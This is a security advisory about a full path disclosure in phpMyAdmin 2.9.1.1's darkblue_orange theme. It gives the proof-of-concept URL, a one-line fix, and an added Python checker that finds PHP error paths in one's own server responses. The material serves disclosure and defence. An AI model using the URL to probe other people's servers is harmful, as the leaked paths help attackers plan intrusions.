·= Security Advisory =·

Issue: Remote Information Disclosure Vulnerabilities in "phpMyAdmin".
Discovered Date: 02/01/2007
Author: Tal Argoni. [talargoni at gmail.com]
Product Vendor: http://www.phpmyadmin.net/

Details:
phpMyAdmin is prone to an information disclosure vulnerability. The vulnerability exists in the "darkblue_orange" visual theme and is caused by poor configuration. When the file
http://www.example.com/phpMyAdmin/themes/darkblue_orange/layout.inc.php
is requested, PHP returns a fatal error that discloses the full path of the file on the server.

Exploitation URL: http://www.example.com/phpMyAdmin/themes/darkblue_orange/layout.inc.php

Vulnerable: phpMyAdmin v2.9.1.1

Solution: Go to line 33 and comment out the line.
//$GLOBALS['cfg']['MainBackground']....;

Proof Of Concept: http://www.example.com/phpMyAdmin/themes/darkblue_orange/layout.inc.php
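
As an added example (not part of the original advisory), the Python function below checks an HTTP response body from your own deployment for PHP error output that exposes an absolute filesystem path, which is the symptom described above. The sample bodies, their directory prefixes and message text are constructed, and `find_path_leaks` is a hypothetical name.

```python
import html
import re

# PHP prints errors as "<level>: <message> in <file> on line <n>" when
# display_errors is on. With html_errors the level, file and line number are
# wrapped in <b> tags, so tags are stripped before matching.
_TAG = re.compile(r"<[^>]+>")
_PHP_ERROR = re.compile(
    r"(?P<level>Fatal error|Parse error|Warning|Notice):\s+(?P<message>.*?)"
    r"\s+in\s+(?P<path>(?:/|[A-Za-z]:[\\/])\S.*?)\s+on line\s+(?P<line>\d+)"
)


def find_path_leaks(body):
    """Return one dict per PHP error message in a response body that
    exposes an absolute path (Unix or Windows). Relative paths are ignored."""
    text = html.unescape(_TAG.sub("", body))
    leaks = []
    for m in _PHP_ERROR.finditer(text):
        leaks.append({
            "level": m.group("level"),
            "path": m.group("path"),
            "line": int(m.group("line")),
        })
    return leaks


# Constructed sample bodies (not captured from a real server).
SAMPLE_HTML = (
    "<br />\n<b>Fatal error</b>:  constructed message text in "
    "<b>/var/www/html/phpMyAdmin/themes/darkblue_orange/layout.inc.php</b>"
    " on line <b>33</b><br />\n"
)
SAMPLE_PLAIN = (
    "Warning: constructed message text in "
    "C:\\www\\phpMyAdmin\\themes\\darkblue_orange\\layout.inc.php on line 33\n"
)
SAMPLE_CLEAN = "<html><body>no error output here</body></html>"

if __name__ == "__main__":
    for name, body in (("html", SAMPLE_HTML), ("plain", SAMPLE_PLAIN),
                       ("clean", SAMPLE_CLEAN)):
        print(name, find_path_leaks(body))
```

An empty result for the theme file's response after applying the fix indicates the path is no longer echoed to the client.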